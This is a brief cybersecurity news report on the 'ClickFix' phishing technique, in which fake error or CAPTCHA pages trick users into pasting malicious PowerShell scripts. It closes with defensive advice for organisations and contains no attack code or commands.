205/68 Monday, June 9, 2025
Cybersecurity researchers are warning of a new and increasingly sophisticated phishing technique known as “ClickFix,” which is rapidly gaining traction and targeting businesses worldwide. The technique represents a significant evolution in social engineering attacks, as it lures victims into performing seemingly routine or benign tasks that ultimately lead to malware installation. According to reports from security firms such as Darktrace and SlashNext, ClickFix campaigns have been observed across multiple regions, highlighting its growing adoption among cybercriminals.
ClickFix first gained attention in 2023 when researchers at Proofpoint identified compromised websites displaying overlay error messages that claimed the user’s browser needed an update. Victims were tricked into opening Windows PowerShell (Admin) and running a script that appeared to be a fix, but actually delivered malware like Vidar stealer. Since April 2024, ClickFix techniques have evolved to include delivery of various malware types including Remote Access Trojans (RATs), backdoors, cryptominers, and even ransomware. The phishing lures also vary—from fake browser plugin updates to fraudulent job interview sites designed to trick victims into installing password stealers or backdoors.
Experts emphasize that ClickFix’s success lies in its deceptive simplicity—convincing users to take trusted actions that actually compromise their systems. Attackers have mimicked trusted interfaces such as Cloudflare Turnstile CAPTCHAs or even Booking.com error pages to get users to copy and paste malicious scripts. Alarming trends also show that ClickFix is now being sold as a plug-and-play module on underground forums, lowering the technical barrier for would-be attackers and signaling a shift toward modular, customizable phishing kits.
Cybersecurity professionals advise organizations to rethink phishing defense beyond basic email filtering and awareness training. Defense strategies should include monitoring post-click browser activity, deploying multi-factor authentication to thwart phishing outcomes, detecting suspicious redirect behavior, and preparing incident response plans to mitigate damage when attacks succeed.
Source https://www.darkreading.com/remote-workforce/cutting-edge-clickfix-snowball-phishing
